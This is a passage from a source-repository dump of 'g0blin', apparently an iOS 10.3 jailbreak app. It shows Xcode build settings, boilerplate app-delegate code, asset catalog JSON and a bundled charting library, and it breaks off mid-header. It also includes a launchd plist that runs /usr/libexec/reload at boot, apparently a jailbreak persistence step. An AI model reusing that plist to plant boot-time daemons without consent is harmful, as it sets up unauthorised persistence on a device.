CLANG_ANALYZER_NONNULL = YES; 334 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 335 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 336 | CLANG_CXX_LIBRARY = "libc++"; 337 | CLANG_ENABLE_MODULES = YES; 338 | CLANG_ENABLE_OBJC_ARC = YES; 339 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 340 | CLANG_WARN_BOOL_CONVERSION = YES; 341 | CLANG_WARN_COMMA = YES; 342 | CLANG_WARN_CONSTANT_CONVERSION = YES; 343 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 344 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 345 | CLANG_WARN_EMPTY_BODY = YES; 346 | CLANG_WARN_ENUM_CONVERSION = YES; 347 | CLANG_WARN_INFINITE_RECURSION = YES; 348 | CLANG_WARN_INT_CONVERSION = YES; 349 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 350 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 351 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 352 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 353 | CLANG_WARN_STRICT_PROTOTYPES = YES; 354 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 355 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 356 | CLANG_WARN_UNREACHABLE_CODE = YES; 357 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 358 | CODE_SIGN_IDENTITY = "iPhone Developer"; 359 | COPY_PHASE_STRIP = NO; 360 | DEBUG_INFORMATION_FORMAT = dwarf; 361 | ENABLE_STRICT_OBJC_MSGSEND = YES; 362 | ENABLE_TESTABILITY = YES; 363 | GCC_C_LANGUAGE_STANDARD = gnu11; 364 | GCC_DYNAMIC_NO_PIC = NO; 365 | GCC_NO_COMMON_BLOCKS = YES; 366 | GCC_OPTIMIZATION_LEVEL = 0; 367 | GCC_PREPROCESSOR_DEFINITIONS = ( 368 | "DEBUG=1", 369 | "$(inherited)", 370 | ); 371 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 372 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 373 | GCC_WARN_UNDECLARED_SELECTOR = YES; 374 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 375 | GCC_WARN_UNUSED_FUNCTION = YES; 376 | GCC_WARN_UNUSED_VARIABLE = YES; 377 | IPHONEOS_DEPLOYMENT_TARGET = 10.3; 378 | MTL_ENABLE_DEBUG_INFO = YES; 379 | ONLY_ACTIVE_ARCH = YES; 380 | SDKROOT = iphoneos; 381 | VALID_ARCHS = ""; 382 | }; 383 | name = Debug; 384 | }; 385 | EE9402501FF33CAE00C9325F /* Release */ = { 386 | isa = XCBuildConfiguration; 387 | buildSettings = { 388 | ALWAYS_SEARCH_USER_PATHS = NO; 389 | CLANG_ANALYZER_NONNULL = YES; 390 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 391 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 392 | CLANG_CXX_LIBRARY = "libc++"; 393 | CLANG_ENABLE_MODULES = YES; 394 | CLANG_ENABLE_OBJC_ARC = YES; 395 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 396 | CLANG_WARN_BOOL_CONVERSION = YES; 397 | CLANG_WARN_COMMA = YES; 398 | CLANG_WARN_CONSTANT_CONVERSION = YES; 399 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 400 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 401 | CLANG_WARN_EMPTY_BODY = YES; 402 | CLANG_WARN_ENUM_CONVERSION = YES; 403 | CLANG_WARN_INFINITE_RECURSION = YES; 404 | CLANG_WARN_INT_CONVERSION = YES; 405 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 406 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 407 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 408 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 409 | CLANG_WARN_STRICT_PROTOTYPES = YES; 410 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 411 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 412 | CLANG_WARN_UNREACHABLE_CODE = YES; 413 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 414 | CODE_SIGN_IDENTITY = "iPhone Developer"; 415 | COPY_PHASE_STRIP = NO; 416 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 417 | ENABLE_NS_ASSERTIONS = NO; 418 | ENABLE_STRICT_OBJC_MSGSEND = YES; 419 | GCC_C_LANGUAGE_STANDARD = gnu11; 420 | GCC_NO_COMMON_BLOCKS = YES; 421 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 422 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 423 | GCC_WARN_UNDECLARED_SELECTOR = YES; 424 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 425 | GCC_WARN_UNUSED_FUNCTION = YES; 426 | GCC_WARN_UNUSED_VARIABLE = YES; 427 | IPHONEOS_DEPLOYMENT_TARGET = 10.3; 428 | MTL_ENABLE_DEBUG_INFO = NO; 429 | SDKROOT = iphoneos; 430 | VALIDATE_PRODUCT = YES; 431 | VALID_ARCHS = ""; 432 | }; 433 | name = Release; 434 | }; 435 | EE9402521FF33CAE00C9325F /* Debug */ = { 436 | isa = XCBuildConfiguration; 437 | buildSettings = { 438 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 439 | CODE_SIGN_STYLE = Automatic; 440 | DEVELOPMENT_TEAM = 23C653WLNB; 441 | INFOPLIST_FILE = g0blin/Info.plist; 442 | IPHONEOS_DEPLOYMENT_TARGET = 10.3; 443 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 444 | OTHER_LDFLAGS = ""; 445 | PRODUCT_BUNDLE_IDENTIFIER = net.sticktron.g0blin; 446 | PRODUCT_NAME = "$(TARGET_NAME)"; 447 | TARGETED_DEVICE_FAMILY = "1,2"; 448 | VALID_ARCHS = arm64; 449 | }; 450 | name = Debug; 451 | }; 452 | EE9402531FF33CAE00C9325F /* Release */ = { 453 | isa = XCBuildConfiguration; 454 | buildSettings = { 455 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 456 | CODE_SIGN_STYLE = Automatic; 457 | DEVELOPMENT_TEAM = 23C653WLNB; 458 | INFOPLIST_FILE = g0blin/Info.plist; 459 | IPHONEOS_DEPLOYMENT_TARGET = 10.3; 460 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 461 | OTHER_LDFLAGS = ""; 462 | PRODUCT_BUNDLE_IDENTIFIER = net.sticktron.g0blin; 463 | PRODUCT_NAME = "$(TARGET_NAME)"; 464 | TARGETED_DEVICE_FAMILY = "1,2"; 465 | VALID_ARCHS = arm64; 466 | }; 467 | name = Release; 468 | }; 469 | /* End XCBuildConfiguration section */ 470 | 471 | /* Begin XCConfigurationList section */ 472 | EE9402361FF33CAE00C9325F /* Build configuration list for PBXProject "g0blin" */ = { 473 | isa = XCConfigurationList; 474 | buildConfigurations = ( 475 | EE94024F1FF33CAE00C9325F /* Debug */, 476 | EE9402501FF33CAE00C9325F /* Release */, 477 | ); 478 | defaultConfigurationIsVisible = 0; 479 | defaultConfigurationName = Release; 480 | }; 481 | EE9402511FF33CAE00C9325F /* Build configuration list for PBXNativeTarget "g0blin" */ = { 482 | isa = XCConfigurationList; 483 | buildConfigurations = ( 484 | EE9402521FF33CAE00C9325F /* Debug */, 485 | EE9402531FF33CAE00C9325F /* Release */, 486 | ); 487 | defaultConfigurationIsVisible = 0; 488 | defaultConfigurationName = Release; 489 | }; 490 | /* End XCConfigurationList section */ 491 | }; 492 | rootObject = EE9402331FF33CAE00C9325F /* Project object */; 493 | } 494 | -------------------------------------------------------------------------------- /g0blin.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /g0blin/0.reload.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | 0.reload 7 | ProgramArguments 8 | 9 | /usr/libexec/reload 10 | 11 | RunAtLoad 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /g0blin/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2017-12-26. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /g0blin/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2017-12-26. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | 18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 19 | // Override point for customization after application launch. 20 | return YES; 21 | } 22 | 23 | 24 | - (void)applicationWillResignActive:(UIApplication *)application { 25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 27 | } 28 | 29 | 30 | - (void)applicationDidEnterBackground:(UIApplication *)application { 31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 33 | } 34 | 35 | 36 | - (void)applicationWillEnterForeground:(UIApplication *)application { 37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 38 | } 39 | 40 | 41 | - (void)applicationDidBecomeActive:(UIApplication *)application { 42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 43 | } 44 | 45 | 46 | - (void)applicationWillTerminate:(UIApplication *)application { 47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 48 | } 49 | 50 | 51 | @end 52 | -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/3.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "size" : "20x20", 5 | "idiom" : "iphone", 6 | "filename" : "Icon-Small-40.png", 7 | "scale" : "2x" 8 | }, 9 | { 10 | "size" : "20x20", 11 | "idiom" : "iphone", 12 | "filename" : "Icon-60.png", 13 | "scale" : "3x" 14 | }, 15 | { 16 | "size" : "29x29", 17 | "idiom" : "iphone", 18 | "filename" : "Icon-Small@2x.png", 19 | "scale" : "2x" 20 | }, 21 | { 22 | "size" : "29x29", 23 | "idiom" : "iphone", 24 | "filename" : "Icon-Small@3x.png", 25 | "scale" : "3x" 26 | }, 27 | { 28 | "size" : "40x40", 29 | "idiom" : "iphone", 30 | "filename" : "Icon-Small-40@2x.png", 31 | "scale" : "2x" 32 | }, 33 | { 34 | "size" : "40x40", 35 | "idiom" : "iphone", 36 | "filename" : "Icon-Small-40@3x.png", 37 | "scale" : "3x" 38 | }, 39 | { 40 | "size" : "60x60", 41 | "idiom" : "iphone", 42 | "filename" : "3.png", 43 | "scale" : "2x" 44 | }, 45 | { 46 | "size" : "60x60", 47 | "idiom" : "iphone", 48 | "filename" : "Icon-60@3x.png", 49 | "scale" : "3x" 50 | }, 51 | { 52 | "size" : "20x20", 53 | "idiom" : "ipad", 54 | "filename" : "Icon-20.png", 55 | "scale" : "1x" 56 | }, 57 | { 58 | "size" : "20x20", 59 | "idiom" : "ipad", 60 | "filename" : "Icon-Small-41.png", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "size" : "29x29", 65 | "idiom" : "ipad", 66 | "filename" : "Icon-Small.png", 67 | "scale" : "1x" 68 | }, 69 | { 70 | "size" : "29x29", 71 | "idiom" : "ipad", 72 | "filename" : "Icon-Small@2x-1.png", 73 | "scale" : "2x" 74 | }, 75 | { 76 | "size" : "40x40", 77 | "idiom" : "ipad", 78 | "filename" : "Icon-Small-42.png", 79 | "scale" : "1x" 80 | }, 81 | { 82 | "size" : "40x40", 83 | "idiom" : "ipad", 84 | "filename" : "Icon-Small-40@2x-1.png", 85 | "scale" : "2x" 86 | }, 87 | { 88 | "size" : "76x76", 89 | "idiom" : "ipad", 90 | "filename" : "Icon-76.png", 91 | "scale" : "1x" 92 | }, 93 | { 94 | "size" : "76x76", 95 | "idiom" : "ipad", 96 | "filename" : "Icon-76@2x.png", 97 | "scale" : "2x" 98 | }, 99 | { 100 | "size" : "83.5x83.5", 101 | "idiom" : "ipad", 102 | "filename" : "Icon-835@2x.png", 103 | "scale" : "2x" 104 | }, 105 | { 106 | "size" : "1024x1024", 107 | "idiom" : "ios-marketing", 108 | "filename" : "iTunesArtwork@2x.png", 109 | "scale" : "1x" 110 | } 111 | ], 112 | "info" : { 113 | "version" : 1, 114 | "author" : "xcode" 115 | } 116 | } -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-20.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-60.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-60.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-60@3x.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-76.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-76.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-76@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-76@2x.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-835@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-835@2x.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small-40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small-40.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small-40@2x-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small-40@2x-1.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small-40@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small-40@2x.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small-40@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small-40@3x.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small-41.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small-41.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small-42.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small-42.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small@2x-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small@2x-1.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small@2x.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/Icon-Small@3x.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/AppIcon.appiconset/iTunesArtwork@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/AppIcon.appiconset/iTunesArtwork@2x.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/jailbreak-tab.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "filename" : "jailbreak.pdf" 6 | } 7 | ], 8 | "info" : { 9 | "version" : 1, 10 | "author" : "xcode" 11 | }, 12 | "properties" : { 13 | "compression-type" : "lossless", 14 | "template-rendering-intent" : "template" 15 | } 16 | } -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/jailbreak-tab.imageset/jailbreak.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/jailbreak-tab.imageset/jailbreak.pdf -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/logo-lit.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "filename" : "logo-lit@2x.png", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "filename" : "logo-lit@3x.png", 15 | "scale" : "3x" 16 | } 17 | ], 18 | "info" : { 19 | "version" : 1, 20 | "author" : "xcode" 21 | }, 22 | "properties" : { 23 | "compression-type" : "lossless" 24 | } 25 | } -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/logo-lit.imageset/logo-lit@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/logo-lit.imageset/logo-lit@2x.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/logo-lit.imageset/logo-lit@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/logo-lit.imageset/logo-lit@3x.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/logo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "filename" : "g0blin@2x.png", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "filename" : "g0blin@3x.png", 15 | "scale" : "3x" 16 | } 17 | ], 18 | "info" : { 19 | "version" : 1, 20 | "author" : "xcode" 21 | }, 22 | "properties" : { 23 | "compression-type" : "lossless" 24 | } 25 | } -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/logo.imageset/g0blin@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/logo.imageset/g0blin@2x.png -------------------------------------------------------------------------------- /g0blin/Assets.xcassets/logo.imageset/g0blin@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/Assets.xcassets/logo.imageset/g0blin@3x.png -------------------------------------------------------------------------------- /g0blin/BEMSimpleLineGraph/BEMAverageLine.h: -------------------------------------------------------------------------------- 1 | // 2 | // BEMAverageLine.h 3 | // SimpleLineChart 4 | // 5 | // Created by Sam Spencer on 4/7/15. 6 | // Copyright (c) 2015 Boris Emorine. All rights reserved. 7 | // 8 | 9 | @import Foundation; 10 | @import UIKit; 11 | 12 | 13 | /// A line displayed horizontally across the graph at the average y-value 14 | @interface BEMAverageLine : NSObject 15 | 16 | 17 | /// When set to YES, an average line will be displayed on the line graph 18 | @property (nonatomic) BOOL enableAverageLine; 19 | 20 | 21 | /// The color of the average line 22 | @property (strong, nonatomic) UIColor *color; 23 | 24 | 25 | /// The Y-Value of the average line. This could be an average, a median, a mode, sum, etc. 26 | @property (nonatomic) CGFloat yValue; 27 | 28 | 29 | /// The alpha of the average line 30 | @property (nonatomic) CGFloat alpha; 31 | 32 | 33 | /// The width of the average line 34 | @property (nonatomic) CGFloat width; 35 | 36 | 37 | /// Dash pattern for the average line 38 | @property (strong, nonatomic) NSArray *dashPattern; 39 | 40 | 41 | @end 42 | -------------------------------------------------------------------------------- /g0blin/BEMSimpleLineGraph/BEMAverageLine.m: -------------------------------------------------------------------------------- 1 | // 2 | // BEMAverageLine.m 3 | // SimpleLineChart 4 | // 5 | // Created by Sam Spencer on 4/7/15. 6 | // Copyright (c) 2015 Boris Emorine. All rights reserved. 7 | // 8 | 9 | #import "BEMAverageLine.h" 10 | 11 | @implementation BEMAverageLine 12 | 13 | - (instancetype)init { 14 | self = [super init]; 15 | if (self) { 16 | _enableAverageLine = NO; 17 | _color = [UIColor whiteColor]; 18 | _alpha = 1.0; 19 | _width = 3.0; 20 | _yValue = 0.0; 21 | } 22 | 23 | return self; 24 | } 25 | 26 | @end 27 | -------------------------------------------------------------------------------- /g0blin/BEMSimpleLineGraph/BEMCircle.h: -------------------------------------------------------------------------------- 1 | // 2 | // BEMCircle.h 3 | // SimpleLineGraph 4 | // 5 | // Created by Bobo on 12/27/13. Updated by Sam Spencer on 1/11/14. 6 | // Copyright (c) 2013 Boris Emorine. All rights reserved. 7 | // Copyright (c) 2014 Sam Spencer. 8 | // 9 | 10 | @import Foundation; 11 | @import UIKit; 12 | @import CoreGraphics; 13 | 14 | 15 | /// Class to draw the circle for the points. 16 | @interface BEMCircle : UIView 17 | 18 | /// Set to YES if the data point circles should be constantly displayed. NO if they should only appear when relevant. 19 | @property (assign, nonatomic) BOOL shouldDisplayConstantly; 20 | 21 | /// The point color 22 | @property (strong, nonatomic) UIColor *Pointcolor; 23 | 24 | /// The value of the point 25 | @property (nonatomic) CGFloat absoluteValue; 26 | 27 | @end -------------------------------------------------------------------------------- /g0blin/BEMSimpleLineGraph/BEMCircle.m: -------------------------------------------------------------------------------- 1 | // 2 | // BEMCircle.m 3 | // SimpleLineGraph 4 | // 5 | // Created by Bobo on 12/27/13. Updated by Sam Spencer on 1/11/14. 6 | // Copyright (c) 2013 Boris Emorine. All rights reserved. 7 | // Copyright (c) 2014 Sam Spencer. 8 | // 9 | 10 | #import "BEMCircle.h" 11 | 12 | @implementation BEMCircle 13 | 14 | - (instancetype)initWithFrame:(CGRect)frame { 15 | self = [super initWithFrame:frame]; 16 | if (self) { 17 | // Initialization code 18 | self.backgroundColor = [UIColor clearColor]; 19 | } 20 | return self; 21 | } 22 | 23 | - (void)drawRect:(CGRect)rect { 24 | CGContextRef ctx = UIGraphicsGetCurrentContext(); 25 | CGContextAddEllipseInRect(ctx, rect); 26 | [self.Pointcolor set]; 27 | CGContextFillPath(ctx); 28 | } 29 | 30 | @end -------------------------------------------------------------------------------- /g0blin/BEMSimpleLineGraph/BEMLine.h: -------------------------------------------------------------------------------- 1 | // 2 | // BEMLine.h 3 | // SimpleLineGraph 4 | // 5 | // Created by Bobo on 12/27/13. Updated by Sam Spencer on 1/11/14. 6 | // Copyright (c) 2013 Boris Emorine. All rights reserved. 7 | // Copyright (c) 2014 Sam Spencer. 8 | // 9 | 10 | @import Foundation; 11 | @import UIKit; 12 | @import CoreGraphics; 13 | 14 | #import "BEMAverageLine.h" 15 | 16 | 17 | /// The type of animation used to display the graph 18 | typedef NS_ENUM(NSInteger, BEMLineAnimation) { 19 | /// The draw animation draws the lines from left to right and bottom to top. 20 | BEMLineAnimationDraw, 21 | /// The fade animation fades in the lines from 0% opaque to 100% opaque (based on the \p lineAlpha property). 22 | BEMLineAnimationFade, 23 | /// The expand animation expands the lines from a small point to their full width (based on the \p lineWidth property). 24 | BEMLineAnimationExpand, 25 | /// No animation is used to display the graph 26 | BEMLineAnimationNone 27 | }; 28 | 29 | /// The drawing direction of the gradient used to draw the graph line (if any) 30 | typedef NS_ENUM(NSUInteger, BEMLineGradientDirection) { 31 | /// The gradient is drawn from left to right 32 | BEMLineGradientDirectionHorizontal = 0, 33 | /// The gradient is drawn from top to bottom 34 | BEMLineGradientDirectionVertical = 1 35 | }; 36 | 37 | 38 | /// Class to draw the line of the graph 39 | @interface BEMLine : UIView 40 | 41 | 42 | 43 | //----- POINTS -----// 44 | 45 | /// All of the Y-axis values for the points 46 | @property (strong, nonatomic) NSArray *arrayOfPoints; 47 | 48 | /// All of the X-Axis coordinates used to draw vertical lines through 49 | @property (strong, nonatomic) NSArray *arrayOfVerticalRefrenceLinePoints; 50 | 51 | /// The value used to offset the fringe vertical reference lines when the x-axis labels are on the edge 52 | @property (assign, nonatomic) CGFloat verticalReferenceHorizontalFringeNegation; 53 | 54 | /// All of the Y-Axis coordinates used to draw horizontal lines through 55 | @property (strong, nonatomic) NSArray *arrayOfHorizontalRefrenceLinePoints; 56 | 57 | /// All of the point values 58 | @property (strong, nonatomic) NSArray *arrayOfValues; 59 | 60 | /** Draw thin, translucent, reference lines using the provided X-Axis and Y-Axis coordinates. 61 | @see Use \p arrayOfVerticalRefrenceLinePoints to specify vertical reference lines' positions. Use \p arrayOfHorizontalRefrenceLinePoints to specify horizontal reference lines' positions. */ 62 | @property (assign, nonatomic) BOOL enableRefrenceLines; 63 | 64 | /** Draw a thin, translucent, frame on the edge of the graph to separate it from the labels on the X-Axis and the Y-Axis. */ 65 | @property (assign, nonatomic) BOOL enableRefrenceFrame; 66 | 67 | /** If reference frames are enabled, this will enable/disable specific borders. Default: YES */ 68 | @property (assign, nonatomic) BOOL enableLeftReferenceFrameLine; 69 | 70 | /** If reference frames are enabled, this will enable/disable specific borders. Default: YES */ 71 | @property (assign, nonatomic) BOOL enableBottomReferenceFrameLine; 72 | 73 | /** If reference frames are enabled, this will enable/disable specific borders. Default: NO */ 74 | @property (assign, nonatomic) BOOL enableRightReferenceFrameLine; 75 | 76 | /** If reference frames are enabled, this will enable/disable specific borders. Default: NO */ 77 | @property (assign, nonatomic) BOOL enableTopReferenceFrameLine; 78 | 79 | /** Dash pattern for the references line on the X axis */ 80 | @property (nonatomic, strong) NSArray *lineDashPatternForReferenceXAxisLines; 81 | 82 | /** Dash pattern for the references line on the Y axis */ 83 | @property (nonatomic, strong) NSArray *lineDashPatternForReferenceYAxisLines; 84 | 85 | /** If a null value is present, interpolation would draw a best fit line through the null point bound by its surrounding points. Default: YES */ 86 | @property (assign, nonatomic) BOOL interpolateNullValues; 87 | 88 | /** Draws everything but the main line on the graph; correlates to the \p displayDotsOnly property. Default: NO */ 89 | @property (assign, 